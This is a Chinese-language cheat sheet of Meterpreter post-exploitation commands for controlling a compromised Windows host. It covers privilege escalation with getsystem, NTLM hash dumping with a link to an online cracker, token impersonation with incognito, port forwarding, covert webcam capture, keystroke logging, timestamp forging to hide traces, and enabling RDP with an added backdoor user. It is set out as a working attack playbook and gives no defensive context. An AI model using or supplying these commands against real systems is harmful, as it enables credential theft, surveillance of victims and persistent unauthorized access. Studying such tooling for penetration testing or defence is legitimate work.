meterpreter后期攻击使用方法

1、上传文件到Windows主机

upload <file> <destination> 

命令2：从windows主机下载文件

download <file> <path to save> 

注意：Windows路径要使用双斜线

命令3：在目标主机上执行exe文件

execute -f <path> [options] 

 例：execute -f c://1.exe 

命令4：创建CMD新通道

execute -f cmd -c 

命令5：显示进程（相当于打开任务管理器）

ps命令会显示目标主机上所有正在运行的进程

命令：

ps 

命令6：获取目标主机的cmd shell

shell命令可以进入目标主机的cmd

命令：shell 

命令7：获取admin权限

getsystem命令可以提权到本地系统权限

命令：getsystem 

命令8：使用Hashdump转储所有hash值

我们可以使用meterpreter shell来dump目标主机的当前系统账户和密码。转储的内容是NTML哈希格式，网上有很多工具和技巧来破解它们。

NTLM在线破解：https://hashkiller.co.uk/ntlm-decrypter.aspx

命令：hashdump 

输出的每一行内容格式如下

Username:SID:LM hash:NTLM hash::: （重点：每个Windows用户都有自己唯一的SID。

Windows系统管理员administrator的UID是500，普通用户UID从1000开始。

）（SID也就是安全标识符（Security Identifiers），是标识用户、组和计算机帐户的唯一的号码。）

命令10：创建端口转发（了解）

meterpreter shell中的portfwd命令是转发技术中最常用的一个命令，可以让攻击系统访问本来无法直接访问的目标主机。

add选项会将端口转发添加到列表中，而且本质上会创建一个隧道。

请注意：这个隧道存在于meterpreter控制台之外，任何终端会话都可以使用。

命令：portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口

命令11：删除端口转发

跟创建端口转发命令类似，这条命令是删除一条端口转发记录

命令：

portfwd delete -l <portnumber> -p <portnumber> -r <Target IP> 

如果你想显示所有端口转发记录，你可以使用portfwd list命令，如果你想删除所有的记录，可以使用portfwd flush命令

命令12：在目标主机上搜索文件

搜索命令可以来定位查找目标主机上的特定文件。这个命令可以搜索整个文件系统，也可以搜索特定的文件夹。

例如，如果你想搜索目标主机上的所有txt文件，可以使用下列命令：

命令：search -f  *.txt 

命令13：获取用户ID

getuid命令会显示主机上运行meterpreter 服务的用户

命令：getuid 

命令14：获取系统信息

sysinfo命令会显示系统名，操作系统，架构和语言等。

命令：sysinfo 

命令15：模拟任意用户(token操作)

（不一定百分百成功，但是有几率。用户之间不需要密码，用token值来切换。）

这个进程对于攻击像微软活动目录这样的分布式系统非常有帮助，因为在微软活动目录中，本地访问权限并没多大用，但是如果能搞到凭证尤其是管理员凭证，那就非常有用了。

incognito最开始是一个独立的应用，当你成功入侵系统后可以用它来模拟用户tokens。这个应用后来集成到了metasploit，并且最终集成到了meterpreter中，使用如下：

在meterpreter会话中加载这个模块非常简单，只要输入 use incognito命令即可

输入list_tokens -u来显示所有有效的tokens

然后我们需要模拟某个token来获取其权限。还有注意，如果成功模拟了一个token，我们可以使用getuid命令来检查当前用户ID

1.use incognito 

2.list_tokens -u 

3.impersonate_token “Machine\\user” 

命令16：webcam摄像头命令

webcam_list  #查看摄像头

webcam_snap   #通过摄像头拍照

webcam_stream   #通过摄像头开启视频

命令17：execute执行文件（这条不用记，看前面的就行）

execute #在目标机中执行文件

execute -H -i -f cmd.exe #创建新进程cmd.exe，-H不可见，-i交互

命令18：timestomp伪造时间戳

timestomp C:// -h   #查看帮助

timestomp -v C://2.txt   #查看时间戳

timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt

命令19：enable_rdp脚本开启3389

run post/windows/manage/enable_rdp  #开启远程桌面

run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户

run post/windows/manage/enable_rdp FORWARD=true LPORT=6662  #将3389端口转发到6662

脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb通过enable_rdp.rb脚本可知：开启rdp是通过reg修改注册表；添加用户是调用cmd.exe 通过net user添加；端口转发是利用的portfwd命令

命令20：键盘记录

keyscan_start  #开始键盘记录

keyscan_dump   #导出记录数据

keyscan_stop #结束键盘记录